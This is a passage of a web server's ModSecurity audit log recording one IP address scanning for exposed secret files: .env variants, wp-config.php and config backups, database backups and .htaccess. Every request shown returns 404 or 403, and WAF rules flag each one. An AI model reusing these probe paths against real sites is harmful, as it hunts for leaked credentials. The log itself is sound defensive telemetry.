Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ecacc023-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ecacc023-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/changelog.txt.bak"] [unique_id "aFBqtk3CmevS3xeTzmoi9AAAAAQ"] Stopwatch: 1750100662708758 3070 (- - -) Stopwatch2: 1750100662708758 3070; combined=1846, p1=342, p2=1446, p3=0, p4=0, p5=58, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ecacc023-Z-- --7d142f6e-A-- [17/Jun/2025:00:34:23.043634 +0530] aFBqt03CmevS3xeTzmoi9QAAAAQ 185.177.72.201 35906 127.0.0.1 7080 --7d142f6e-B-- GET /.env.txt HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7d142f6e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --7d142f6e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.txt"] [unique_id "aFBqt03CmevS3xeTzmoi9QAAAAQ"] Stopwatch: 1750100663040099 3589 (- - -) Stopwatch2: 1750100663040099 3589; combined=2167, p1=436, p2=1678, p3=0, p4=0, p5=53, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7d142f6e-Z-- --51abb036-A-- [17/Jun/2025:00:34:24.043486 +0530] aFBquBwcFb_n1P0IC9xlHAAAAAo 185.177.72.201 36016 127.0.0.1 7080 --51abb036-B-- GET /wp-config.php_orig HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --51abb036-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --51abb036-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php_orig"] [unique_id "aFBquBwcFb_n1P0IC9xlHAAAAAo"] Stopwatch: 1750100664040153 3388 (- - -) Stopwatch2: 1750100664040153 3388; combined=2003, p1=432, p2=1513, p3=0, p4=0, p5=58, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --51abb036-Z-- --f8bc8604-A-- [17/Jun/2025:00:34:24.376109 +0530] aFBquB6Azi2u_ik2Q3Ko7QAAAAY 185.177.72.201 36046 127.0.0.1 7080 --f8bc8604-B-- GET /wp-config.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f8bc8604-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f8bc8604-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.old"] [unique_id "aFBquB6Azi2u_ik2Q3Ko7QAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.old"] [unique_id "aFBquB6Azi2u_ik2Q3Ko7QAAAAY"] Stopwatch: 1750100664372793 3383 (- - -) Stopwatch2: 1750100664372793 3383; combined=1992, p1=402, p2=1507, p3=0, p4=0, p5=83, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f8bc8604-Z-- --e1899b43-A-- [17/Jun/2025:00:34:24.486237 +0530] aFBquFJfblPUQiSn5r1hagAAAAA 185.177.72.201 36056 127.0.0.1 7080 --e1899b43-B-- GET /config.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e1899b43-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e1899b43-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.php.bak"] [unique_id "aFBquFJfblPUQiSn5r1hagAAAAA"] Stopwatch: 1750100664483278 3031 (- - -) Stopwatch2: 1750100664483278 3031; combined=1793, p1=297, p2=1440, p3=0, p4=0, p5=56, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1899b43-Z-- --b3cd066d-A-- [17/Jun/2025:00:34:25.039875 +0530] aFBquX3hoSwVUy254pH0DwAAACQ 185.177.72.201 36124 127.0.0.1 7080 --b3cd066d-B-- GET /wp-config.php_bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b3cd066d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b3cd066d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php_bak"] [unique_id "aFBquX3hoSwVUy254pH0DwAAACQ"] Stopwatch: 1750100665036285 3646 (- - -) Stopwatch2: 1750100665036285 3646; combined=2156, p1=434, p2=1644, p3=0, p4=0, p5=78, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b3cd066d-Z-- --f3b3bf3a-A-- [17/Jun/2025:00:34:25.368864 +0530] aFBquZVkCcfT-Z8NQYyUqwAAAAc 185.177.72.201 36166 127.0.0.1 7080 --f3b3bf3a-B-- GET /.htaccess HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f3b3bf3a-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --f3b3bf3a-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess"] [unique_id "aFBquZVkCcfT-Z8NQYyUqwAAAAc"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess Stopwatch: 1750100665368003 913 (- - -) Stopwatch2: 1750100665368003 913; combined=487, p1=426, p2=0, p3=0, p4=0, p5=60, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f3b3bf3a-Z-- --6efe2e4a-A-- [17/Jun/2025:00:34:25.589613 +0530] aFBquSid3pHxA3RhGpzqCAAAAAk 185.177.72.201 36206 127.0.0.1 7080 --6efe2e4a-B-- GET /install.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6efe2e4a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6efe2e4a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/install.php.old"] [unique_id "aFBquSid3pHxA3RhGpzqCAAAAAk"] Stopwatch: 1750100665586928 2748 (- - -) Stopwatch2: 1750100665586928 2748; combined=1642, p1=288, p2=1297, p3=0, p4=0, p5=57, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6efe2e4a-Z-- --e4399505-A-- [17/Jun/2025:00:34:25.700051 +0530] aFBquX8PxMRZ7s11niQJtgAAAAI 185.177.72.201 36234 127.0.0.1 7080 --e4399505-B-- GET /readme.txt.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e4399505-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e4399505-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".txt.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/readme.txt.old"] [unique_id "aFBquX8PxMRZ7s11niQJtgAAAAI"] Stopwatch: 1750100665696945 3158 (- - -) Stopwatch2: 1750100665696945 3158; combined=1880, p1=445, p2=1380, p3=0, p4=0, p5=55, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e4399505-Z-- --e479a25b-A-- [17/Jun/2025:00:34:26.031884 +0530] aFBquplL5_2Zd8wUdfLI3gAAAAg 185.177.72.201 36268 127.0.0.1 7080 --e479a25b-B-- GET /a.htaccess HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e479a25b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e479a25b-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/a.htaccess"] [unique_id "aFBquplL5_2Zd8wUdfLI3gAAAAg"] Stopwatch: 1750100666028837 3101 (- - -) Stopwatch2: 1750100666028837 3101; combined=1831, p1=364, p2=1407, p3=0, p4=0, p5=60, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e479a25b-Z-- --449cb03b-A-- [17/Jun/2025:00:34:26.141823 +0530] aFBqun3hoSwVUy254pH0EgAAACQ 185.177.72.201 36278 127.0.0.1 7080 --449cb03b-B-- GET /example27-how-to-load-env/sample01/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --449cb03b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --449cb03b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/example27-how-to-load-env/sample01/.env"] [unique_id "aFBqun3hoSwVUy254pH0EgAAACQ"] Stopwatch: 1750100666139126 2751 (- - -) Stopwatch2: 1750100666139126 2751; combined=1671, p1=330, p2=1267, p3=0, p4=0, p5=74, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --449cb03b-Z-- --a0cab96e-A-- [17/Jun/2025:00:34:26.472252 +0530] aFBqun8PxMRZ7s11niQJuAAAAAI 185.177.72.201 36324 127.0.0.1 7080 --a0cab96e-B-- GET /wp-config.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a0cab96e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a0cab96e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.backup"] [unique_id "aFBqun8PxMRZ7s11niQJuAAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.backup"] [unique_id "aFBqun8PxMRZ7s11niQJuAAAAAI"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.backup' not found or unable to stat Stopwatch: 1750100666469417 2891 (- - -) Stopwatch2: 1750100666469417 2891; combined=1675, p1=331, p2=1227, p3=0, p4=0, p5=117, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a0cab96e-Z-- --d198446e-A-- [17/Jun/2025:00:34:26.691382 +0530] aFBquplL5_2Zd8wUdfLI4AAAAAg 185.177.72.201 36338 127.0.0.1 7080 --d198446e-B-- GET /database.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d198446e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d198446e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/database.php.backup"] [unique_id "aFBquplL5_2Zd8wUdfLI4AAAAAg"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/database.php.backup' not found or unable to stat Stopwatch: 1750100666689324 2112 (- - -) Stopwatch2: 1750100666689324 2112; combined=1246, p1=253, p2=941, p3=0, p4=0, p5=52, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d198446e-Z-- --d1e10140-A-- [17/Jun/2025:00:34:27.021652 +0530] aFBqu03CmevS3xeTzmoi_gAAAAQ 185.177.72.201 36374 127.0.0.1 7080 --d1e10140-B-- GET /wp-config.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d1e10140-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d1e10140-H-- Message: Warning. Matched phrase "wp-config.bak" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.bak" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.bak"] [unique_id "aFBqu03CmevS3xeTzmoi_gAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.bak"] [unique_id "aFBqu03CmevS3xeTzmoi_gAAAAQ"] Stopwatch: 1750100667018719 3011 (- - -) Stopwatch2: 1750100667018719 3011; combined=1733, p1=373, p2=1281, p3=0, p4=0, p5=79, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d1e10140-Z-- --b8d9426f-A-- [17/Jun/2025:00:34:27.572158 +0530] aFBqu5lL5_2Zd8wUdfLI4gAAAAg 185.177.72.201 36428 127.0.0.1 7080 --b8d9426f-B-- GET /.env.save HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b8d9426f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: 